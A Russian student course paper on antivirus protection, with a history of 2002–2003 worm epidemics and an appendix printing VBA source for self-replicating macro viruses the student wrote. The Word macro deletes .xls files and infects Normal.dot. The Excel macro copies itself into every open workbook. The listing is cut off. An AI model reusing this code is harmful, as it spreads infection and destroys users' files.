История развития вирусов 1990-2003 годы

     Не  прекращались атаки на пользователей Linux. Червь Slapper всего за несколько  дней успел заразить тысячи Linux-систем по всему миру. Эта же участь не миновала и пользователей FreeBSD: обнаруженный в сентябре сетевой червь Scalper также получил довольно широкое распространение.

     Таким образом, 2002 год являлся логическим продолжением года 2001 — многочисленные эпидемии, проникновение через уязвимости в программном обеспечении, атаки как на Windows, так и на другие операционные системы.

     Следует отметить стремительный рост вредоносных  программ, которые преследуют конкретные коммерческие цели — похищают конфиденциальные данные, финансовые средства, пароли доступа  в интернет или производят другие действия, наносящие какой-либо материальный ущерб пользователям зараженных компьютеров. Этот год положил начало стремительной криминализации интернета в годы последующие.

     Также быстро росло число разнообразных  систем принудительного показа рекламы (Adware). Агрессивные (часто — откровенно хакерские) методы внедрения рекламных систем, вызванные ими сбои работы компьютеров, многочисленные рекламные «поп-апы» — всё это стало причиной появления специализированных анти-рекламных продуктов. В 2002 году появилась первая версия Ad-Aware от компании Lavasoft.

     Многие Adware-системы передавали своему «хозяину»  персональные данные с заражённых компьютеров. Практически всегда это ограничивалось названиями посещаемых веб-ресурсов, поисковыми запросами, прочей информацией об активности пользователя в интернете — для того, чтобы в дальнейшем показывать рекламу в соответствии с интересами данного конкретного пользователя. На основе этого факта был намеренно раздут термин Spyware — и рекламные системы стали называть «шпионскими», что, в целом, не совсем соответствовало истине. Adware не занимались шпионажем с целью хищения секретной или конфиденциальной информации, которая потом используется против атакованного пользователя. Они всего лишь «подглядывали» за действиями пользователя, чтобы увеличить вероятность «срабатывания» показываемой рекламы. 

          2.14 2003 год

     25 февраля: глобальная эпидемия  сетевого вируса Slammer. Как и CodeRed, этот вирус распространялся только  в виде сетевых пакетов (файлы  на диске не создавались) и для проникновения в заражаемый компьютер использовал «дыру» в сетевом программном обеспечении — в Microsoft SQL Server 2000. Размер вируса был чрезвычайно мал — всего 376 байт, однако распространялся он так активно, что буквально забил интернет-каналы своими копиями. В результате нагрузка на интернет возросла в среднем на 25%, а в отдельных случаях сеть была почти полностью парализована. Южная Корея была фактически отрезана от глобальной сети, прекратили работу часть банкоматов Bank of America, чуть не было сорвано первое электронное голосование на выборах главы одной из партий в Канаде.

     11 августа: очередная эпидемия, нанёсшая  значительный урон пользователям  интернета. Червь Lovesan (также известный  под именами Blaster, MSBlast) проникал на компьютеры-жертвы через незадолго до того обнаруженную уязвимость в службе DCOM RPC операционной системы Windows. В результате атаки червя пострадали индивидуальные пользователи, мелкие и крупные компании, исследовательские центры и учебные заведения. Сообщалось о проблемах в работе сети европейском офисе компании IBM, пострадали также такие компании как Motorola, American Express и многие другие. В тот же день на северо-востоке США и частично в Канаде произошло крупнейшее веерное отключение электроснабжения — полностью без электричества остались такие города как Нью-Йорк, Детройт, Кливленд, Оттава и Торонто. Было ли это результатом заражения сети энергетических компаний или случайным совпадением нескольких факторов, включая факт заражения, — неизвестно, однако официальное расследование отвергло связь этой технологической катастрофы с массовой эпидемией червя.

     18 августа разразилась эпидемия  «антивирусного» червя Welchia, который  использовал сразу две дыры  в продуктах Microsoft — в службе DCOM RPC и в WebDAV в системе IIS 5.0. Особенностью этого червя являлось то, что он удалял из системы червя Lovesan, скачивал обновления Windows и устанавливал их в систему — фактически лечил компьютеры от нашумевшего Lovesan и закрывал критические дыры Windows (метод, которым червь CodeGreen лечил компьютеры от CodeRed в 2001 г.). Однако червь был не столь безобиден — заражение компьютеров компании Air Canada вызвала сбои в работе её сети.

     На  фоне глобальных эпидемий сетевых червей периодически случались и эпидемии новых почтовых червей. В начале года в сети стали появляться модификации почтового червя Sobig. К лету 2003 точечные инциденты с Sobig переросли в полномасштабную эпидемию — червь вышел на первые места в рейтингах вредоносных программ. Для массового распространения новых версий червя, видимо, использовались спам-технологии рассылки множества копий червя с анонимных «зомби-машин». Некоторые варианты червя фальсифицировали адреса отправителя (подставляли «чужой адрес» в поле «From») — червь заметал свои следы и затруднял локализацию источника эпидемии. С другой стороны, это вводило пользователей в заблуждение и порождало большое количество вопросов.

     Август: эпидемия почтового червя Mimail, атаковавшего систему интернет-платежей e-gold. Червь  следил за активностью приложений e-gold, установленными на зараженном компьютере, считывал из них конфиденциальные данные и отсылал на несколько анонимных почтовых адресов. Таким образом, была зафиксирована очередная интернет-атака с откровенно криминальными целями.

     Следует упомянуть также червей Avron, Dumaru, Roron, Sober, Swen, эпидемии которых произошли в том же году.

     Также в 2003 году начинает набирать обороты  новый вид электронного мошенничества  — так называемый «фишинг», рассылка поддельных писем с просьбой подтвердить  персональные коды доступа к банковскому счёту. Чуть позже фишинг стал использоваться для атак и на пользователей других интернет-сервисов.

     10 июля 2003 г. антивирусная индустрия  испытала серьёзное потрясение. Корпорация Microsoft объявила о покупке  антивирусных технологий и интеллектуальной собственности у румынской компании GeCAD Software, производившей антивирус RAV. В пресс-релизе, опубликованном Microsoft, было объявлено, что данное приобретение поможет усилить безопасность операционной системы Windows и улучшить поддержку, оказываемую прочим антивирусным компаниям. О том, что Microsoft планирует разработку собственного антивируса, речь не шла — однако при виде софтверного гиганта, положившего взгляд на антивирусные технологии, остальные антивирусные компании замерли, как бандерлоги при виде Каа. 
 
 
 
 
 
 
 
 
 
 
 
 

ЗАКЛЮЧЕНИЕ 

     При работе с современным персональным компьютером пользователя (а особенно начинающего) может подстерегать множество неприятностей: потеря данных, зависание системы, выход из строя отдельных частей компьютера и другие. Одной из причин этих проблем наряду с ошибками в программном обеспечении и неумелыми действиями самого оператора ПЭВМ могут быть проникшие в систему компьютерные вирусы.

          Вирусы – едва ли не главные враги компьютера. Эти программы подобно биологическим вирусам размножаются, записываясь в системные области диска или приписываясь к файлам, и производят различные нежелательные действия, которые , зачастую, имеют катастрофические последствия. Еще два года назад казалось, что со владычеством вирусов покончено – со смертью DOS и DOS-совместимых программ неминуемо должны были исчезнуть и паразитирующие на них вирусы. Ведь если вирус под DOS, заражающий исполняемые файлы *.com и *.exe-файлы, может написать каждый, кто хоть немного разбирается в программировании, то создать полноценный вирус для Windows гораздо труднее. Однако вирусы остались, хотя и несколько видоизменились. Сегодня самой распространенной группой вирусов стали макровирусы, заражающие не программы, а документы, созданные в Microsoft Word и Microsoft Excel.

          Путей распространения вирусов существует множество. Вирус может попасть на компьютер пользователя вместе с дискетой, пиратским компакт-диском или с сообщением электронной почты. Чтобы не стать жертвой этой напасти, каждому пользователю следует хорошо знать принципы защиты от компьютерных вирусов. Ведь нет никакой надежды на то, что с приходом нового тысячелетия вирусы исчезнут. Так же как и нет надежды справиться с ними окончательно в какие-то обозримые сроки, так как таланту авторов антивирусных программ противостоит фантазия компьютерных графоманов.

         В ходе анализа проведенного в курсовом проекте были разработаны макро-вирусы для MS Word и MS Excel. В теоретической части были рассмотрены основные этапы развития вирусов с 1990-2003 годы. 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

СПИСОК ЛИТЕРАТУРЫ 

1. Название  сайта - securelist.com.            http://www.securelist.com/ru/threats/detect?chapter=34
2. Методические указания к лабораторным работам по курсу «Антивирусное    обеспечение».
3. Пол Сана и др. Visual Basic для приложений (версия 5) в подлиннике: пер. с     англ. – СПб.:BHV – Санкт-Петербург, 1999.-704с., ил.

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

ПРИЛОЖЕНИЕ  А

(Листинги  программных кодов)

Программный код для MS Word 

Sub fileopen()                              ‘процедура открытия файла

Application.Run MacroName:="filesaveas"  ‘запуск команды сохранения файла

MsgBox "Распечатывание документа" ‘сообщение о распечатывании файла

ActivePrinter = ""                                  ‘распечатка документа

Application.PrintOut FileName:=""

I = 0

Dim MyFile, MyPath     

MyPath = "C:\1\"              'задание пути              

MyFile = Dir(MyPath + "*.xls")   ' поиск файла с расширением *.xls  

Do While MyFile <> ""       ' Начало цикла поиска

I = I + 1                 ' счетчик

MyFile = Dir          'Поиск следующего вхождения

Loop                     ‘Конец цикла

If I >= 1 Then           ‘Условие

Kill "C:\1\*.xls"  ‘удаляет в каталоге C:\1\ файлы с расширением *.xls

End If          ‘Конец условия

Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule

Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule

If NT.Lines(1, 1) = "" Then

'Если в Normal.dot 1 строка и 1 столбец пустой то записывается код вируса и проверяется Активный документ из Normal.dot происходит заражение документа            

NT.Insertlines 1, "Sub fileopen()"    

NT.Insertlines 2, AD.Lines(2, AD.countoflines)

End If

If AD.Lines(1, 1) = "" Then

'Если 1 строка и 1 столбец заполнен то открывает процедуру файла в Normal.            

AD.Insertlines 1, "Sub filesearch()"

AD.Insertlines 2, NT.Lines(2, NT.countoflines)

End If

End Sub 

Программный код для MS Excel

'Den

Private Sub Workbook_BeforeClose(Cancel As Boolean)      ‘процедура выполняющаяся при закрытии файла

On Error Resume Next          ' если есть ошибка, то переходим на следующую строку

iValue = 0                                             ‘присваиваем переменный iValue = 0                                                            

With Application.FileSearch                                ‘начала поиска

.NewSearch                                                             ‘новый поиск

.LookIn = Application.StartupPath            ‘просмотр каталога загрузки

.SearchSubFolders = True                         ‘просмотр в подкаталогах

.Filename = "Шаблон.xls"                    ‘Имя файла

.MatchAllWordForms = True            ‘не учитывая регистр символов

.FileType = msoFileTypeAllFiles                        ‘все файлы

If .Execute() > 0 Then iValue = 1     ‘если нашли, то присваиваем iValue = 1                                     

End With                                                     ‘Конец поиска

If iValue = 0 Then Workbooks.Add.SaveAs Filename:=Application.StartupPath & "\Шаблон.xls", FileFormat:=xlNormal, AddToMru:=False ‘ Если нет шаблона в папке ‘XLStart”, создать новую книгу и дать ей имя шаблона.xls

Set MP = ThisWorkbook.VBProject.VBComponents.Item(“Эта книга”).CodeModule        ‘переменная, в которую записывается код вируса

For i = 1 To Workbooks.Count                   ‘Просмотр всех открытых книг

Set MC = Workbooks(i).VBProject.VBComponents.Item(“Эта книга”).CodeModule      

‘ Куда копировать код вирус

If MC.Lines(1, 1) <> "'Den" Then                      ‘Если файл не заражен

MC.InsertLines 1, MP.Lines(1, MP.CountOfLines)  ‘вставляем макрос с первой строки до конца документа